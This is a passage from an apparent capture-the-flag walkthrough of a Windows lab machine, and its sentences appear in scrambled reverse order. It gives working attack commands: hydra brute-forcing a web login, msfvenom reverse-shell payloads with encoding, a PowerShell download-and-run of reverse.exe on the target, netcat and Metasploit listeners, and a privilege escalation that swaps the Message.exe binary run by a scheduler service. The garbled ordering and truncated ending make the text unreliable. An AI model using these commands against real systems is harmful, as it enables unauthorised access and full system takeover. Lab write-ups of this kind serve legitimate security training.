On the target machine, just run the regular shell command systeminfo and look for the entry.Ma0 Finding vulnerabilities with Windows Exploit Suggester – NG We can find this without winPEAS (to be honest, I could not find this using winPEAS.). Using winPeas, what was the Original Install time? (This is date and time) We can use these steps to pull winPEAS, and to escalate privileges as before. msfvenom -p windows/shell_reverse_tcp LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -f exe -o reverse.exe nc -lnvp $lport The msfvenom command is also slightly different. This is similar to before, but instead of using metasploit as listener, we’ll use netcat. Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp Now wait a few minutes for WindowsScheduler to run, and we’ll get another meterpreter with root! Now just look for the 2 flags whoami cat C:\Users\jeff\Desktop\user.txt cat C:\Users\Administrator\Desktop\root.txt Task 5: Privilege Escalation Without Metasploit cd "C:\Program Files (x86)\SystemScheduler" upload Message.exe In the previous meterpreter, upload our Message.exe into the correct dir on the target machine. Now start another metasploit instance and start a listener like before. msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -f exe -o Message.exe We now generate our own Message.exe executable with msfvenom, making sure a different lport is used. So we can obtain root by replacing Message.exe with an executable of our choice to spawn a reverse shell. The WindowsScheduler service runs periodically, calling Message.exe with root privilege. What is the user flag (on Jeffs Desktop)? What is the root flag? As a result there will be a runtime error when running the script. Unfortunately, since, xlrd has removed support for xlsx format (ironically, it was apparently due to a security vulnerability). But why? As it turns out, the - update command downloads an xlsx file from Microsoft, which is read from in the analysis step. Problem 2: xlrd deprecated support for xlsx formatĪs we know, the script depends on xlrd library. Running the script using python3 now has no syntax issue, but we’ll encounter another issue. Nonetheless we can pick one of the Pull Request and clone the ported script, for eg, from this repo. The last commit of the repo is in Feb 2017, so the script is not patched to support Python 3, some contributors have ported it to Python 3 but the Pull Requests are not merged. If we try to run the script on Python 3, we get an error: $ python3 windows-exploit-suggester.py File "windows-exploit-suggester.py", line 390 except IOError, e: ^ Synta圎rror: invalid syntax Once downloaded, run it! cd C:\Windows\Temp powershell -c wget "" -outfile "reverse.exe" reverse.exe We don’t have write permissions in the current dir, so first cd to the temp dir. Then on the target machine, pull the file. Upload this to the target machine! Start a local http server: python3 -m rver Then, let’s generate the exe that we’ll run from the target machine export lhost=1.1.1.1 // our local ip export lport=4446 // use a different port! msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -f exe -o reverse.exe msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 1.1.1.1 // our local ip set LPORT 4446 run First, let’s start a listener on metasploit. Let’s upgrade the shell to meterpreter! We’ll need to do another reverse shell, this time using metasploit as listener. Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom. Iis apppool\blog Task 4: Windows Privilege Escalation Now run hydra, wait about 3 minutes and we should see a valid password! The final hydra command should look like this hydra -l admin -P /usr/share/wordlists/rockyou.txt $rhost http-post-form "/Account/login.aspx:_VIEWSTATE=J7/rKT/RbzXElHvOFArr4HX0BUp05PUs+jl4fN5QtFnsigr6tjwFZkWaUW9RaCNkl5wcaaA9I71WXBKsdywllsO45a8kdE+O2GeciLswYLZgMhEIYMOLKvVE1g9/uxmOjygsPrfW43YX1axgD3V/mbHd2lx7jcwje7Qgkp065G2LekTQ
0 Comments
Leave a Reply. |